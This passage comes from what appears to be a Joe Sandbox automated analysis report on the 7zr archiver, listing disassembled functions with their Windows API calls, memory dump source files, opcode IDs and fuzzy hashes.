                                            • Part of subcall function 00C83D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83DCB
                                            • Part of subcall function 00C83D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83DD5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID:
                                          • API String ID: 1532160333-0
                                          • Opcode ID: 0f1eb9d4285e39a0308dbcae475774c0d804da536ddd8d32e1f99158e45fc679
                                          • Instruction ID: e82656d604f8f39f2927bb8d3ceaf75a37ee919ccc1f21a67891b8541a6614d0
                                          • Opcode Fuzzy Hash: 0f1eb9d4285e39a0308dbcae475774c0d804da536ddd8d32e1f99158e45fc679
                                          • Instruction Fuzzy Hash: FC2139B1946B90CFC321CF6A82D0686FFF4BB19604B94996EC0DA83B12C774A548CF65
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CAC0B8
                                            • Part of subcall function 00C97193: __EH_prolog.LIBCMT ref: 00C97198
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$free
                                          • String ID:
                                          • API String ID: 2654054672-0
                                          • Opcode ID: a20713e3c942372d9abb723cd7272d27f7809feb87c008d9321f4808749e2827
                                          • Instruction ID: daa985920e4c0998799ac09a3e069eb83de1e43447e1dbed37f38ce1a98fbc52
                                          • Opcode Fuzzy Hash: a20713e3c942372d9abb723cd7272d27f7809feb87c008d9321f4808749e2827
                                          • Instruction Fuzzy Hash: AEF0E972900312DBD7269F4AE8817AEF3B9EF65764F10412FF82597711CFB19D5086A0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CB0364
                                            • Part of subcall function 00CB01C4: __EH_prolog.LIBCMT ref: 00CB01C9
                                            • Part of subcall function 00CB0143: __EH_prolog.LIBCMT ref: 00CB0148
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                            • Part of subcall function 00CB03D8: __EH_prolog.LIBCMT ref: 00CB03DD
                                            • Part of subcall function 00CB004A: __EH_prolog.LIBCMT ref: 00CB004F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$free
                                          • String ID:
                                          • API String ID: 2654054672-0
                                          • Opcode ID: 2cf466df0a7afe3d7c50ce0ada3b655eec89d16d227cc6a4fd276d354b234eb9
                                          • Instruction ID: b2731081f151e7348bd9cc59cb7dda16d5bbc20bcffc4a82c6bd93646af2cd3c
                                          • Opcode Fuzzy Hash: 2cf466df0a7afe3d7c50ce0ada3b655eec89d16d227cc6a4fd276d354b234eb9
                                          • Instruction Fuzzy Hash: 53F0F430914A50DBCB19FB6CD4267DEBBE4AF00314F20469DF866632D2CFB46B04A754
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 082beef9f95ee4302713d278504b3fc02d72a3d5cc472a433a46a8c7b63dcecc
                                          • Instruction ID: 62937c5df97186c66fb0e2e327fd129f4a9bdc1709f039f2caa11835ba0ca89d
                                          • Opcode Fuzzy Hash: 082beef9f95ee4302713d278504b3fc02d72a3d5cc472a433a46a8c7b63dcecc
                                          • Instruction Fuzzy Hash: A1F0C232E0001AEBCB10EF98D8409EFFB74FF49750B10815AF419E7250CB348A05CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs
                                          • String ID:
                                          • API String ID: 1795875747-0
                                          • Opcode ID: 46ac12df2d1aee49a7e5ad957773820bab03bebcb3695c827163ff13efccdd73
                                          • Instruction ID: 611ff8f4ad351224306739d4be4679ffdcc6d297f40bd32b89786a7f3bb8be55
                                          • Opcode Fuzzy Hash: 46ac12df2d1aee49a7e5ad957773820bab03bebcb3695c827163ff13efccdd73
                                          • Instruction Fuzzy Hash: BAD01232544219BBCF156B98DC05CDD77BCEF08214B04441AF945E2190EA75E61597A4
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CC80AF
                                            • Part of subcall function 00C71E0C: malloc.MSVCRT ref: 00C71E1F
                                            • Part of subcall function 00C71E0C: _CxxThrowException.MSVCRT(?,00D24B28), ref: 00C71E39
                                            • Part of subcall function 00CBBDB5: __EH_prolog.LIBCMT ref: 00CBBDBA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ExceptionThrowmalloc
                                          • String ID:
                                          • API String ID: 3744649731-0
                                          • Opcode ID: 1b0e88c33505d7fd689a3fe0c8d69a520bb268b10779d51d0602554ef18e86b0
                                          • Instruction ID: fbf96f5b00e2238e4695e2a9c34d4a2c049165b285613279c02ee5b40cde8a32
                                          • Opcode Fuzzy Hash: 1b0e88c33505d7fd689a3fe0c8d69a520bb268b10779d51d0602554ef18e86b0
                                          • Instruction Fuzzy Hash: F9D05E71B01101AFCB18FFB8E4267AFB2A0EB44300F10457EA41AE3B81EF749A408A24
                                          APIs
                                          • FindClose.KERNELBASE(00000000,?,00C76880), ref: 00C76853
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 22776b446f075239f81f61d4a17d9b079315b4b7920965eeb3f91f668858b4c1
                                          • Instruction ID: 48fea95ada2efaefcf2774a6f2768ae9f3ed2778bf53fa76d7c88f60335ad240
                                          • Opcode Fuzzy Hash: 22776b446f075239f81f61d4a17d9b079315b4b7920965eeb3f91f668858b4c1
                                          • Instruction Fuzzy Hash: C3D01231154721568A645E3D78449C533D86E063343259759F0B4C31E7D7608CC75750
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs
                                          • String ID:
                                          • API String ID: 1795875747-0
                                          • Opcode ID: 6e4d2e7d43dd9540b423635ddb3455019f43d8b3b4223a07d882c54ea8c5c983
                                          • Instruction ID: 72a1d045a338975679be986b2544f04af82ff45768c4e6b66098c843a151a4de
                                          • Opcode Fuzzy Hash: 6e4d2e7d43dd9540b423635ddb3455019f43d8b3b4223a07d882c54ea8c5c983
                                          • Instruction Fuzzy Hash: E7D0C936048351AF96266F05EC09C8BBBA5FFD5320721482FF480921619B626865DAB0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: memmove
                                          • String ID:
                                          • API String ID: 2162964266-0
                                          • Opcode ID: 7a8891f510b8c881c03e75c00c3fbd19bbe2ea2c21a41d6fb361c3d052539540
                                          • Instruction ID: ddd1e15f3ab0fb6c4b0370eb351310b69a4cf35bafc7b0090c6ec5ba33229811
                                          • Opcode Fuzzy Hash: 7a8891f510b8c881c03e75c00c3fbd19bbe2ea2c21a41d6fb361c3d052539540
                                          • Instruction Fuzzy Hash: 38812E71E0424A9FCF14CFA8C5C4AEDBBB1AF48304F14C46DE929A7241D775AA85CF54
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                          • Instruction ID: eb4f9e263a31d1101e1130992604adf8de8719e97974ea76440b0ffc0d32ab71
                                          • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                          • Instruction Fuzzy Hash: A4D0A77020210903CF884630480973A22841B4030EB284578A922CA181F714C319A1A5
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00CF6B31
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 3fd1f4808bf9d36ab9eba697447117e53c8ecdfbcf2733c420014872d77545d8
                                          • Instruction ID: 631f5ec804741b81e6988c33fc09ac50cf7c02af963b4aa4352c8f7711cacb05
                                          • Opcode Fuzzy Hash: 3fd1f4808bf9d36ab9eba697447117e53c8ecdfbcf2733c420014872d77545d8
                                          • Instruction Fuzzy Hash: F3C08CE1A8D280EFDF0213108C407A03B208B87300F0A10C1E4049B092C6041809C722
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                          • Instruction ID: b32f8d239b017047b4c3c1692e11f7103ff7108b6bafcf93b215ae43927fae0b
                                          • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                          • Instruction Fuzzy Hash: 88A024C551104001DD7C13313C01737100053503077D004FC7505C0103F715C30C1037
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                          • Instruction ID: 2f66a65c62f0c11930b607dd1202733e8f329dcb66adff6c942ec9f857ef9ad2
                                          • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                          • Instruction Fuzzy Hash: 50A012CCE0000001DD5411353801523101262E06057E4C474640440106FB14C1083033
                                          APIs
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CF6BAC
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 0392ea493f70d2c24f768aef2648c900f6456b0dcae31c23190908be10988036
                                          • Instruction ID: 08e20115d726189c3565dd07e47c102b3a746641bdbad908aa4930ab7c92e2d8
                                          • Opcode Fuzzy Hash: 0392ea493f70d2c24f768aef2648c900f6456b0dcae31c23190908be10988036
                                          • Instruction Fuzzy Hash: C5A002786D0700B7ED60A7306D4FF9937247784F05F30D5447241A91D09EE470459A6C
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                          • Instruction ID: f5ddabde96a5b55eedefcc280caea0ff67ac787c507871e6eca989fa02628575
                                          • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                          • Instruction ID: e011f5c8a994da7fc153dae9acca508c067b70cad5322dc9f91ceb0c0996ea5b
                                          • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                          • Instruction Fuzzy Hash: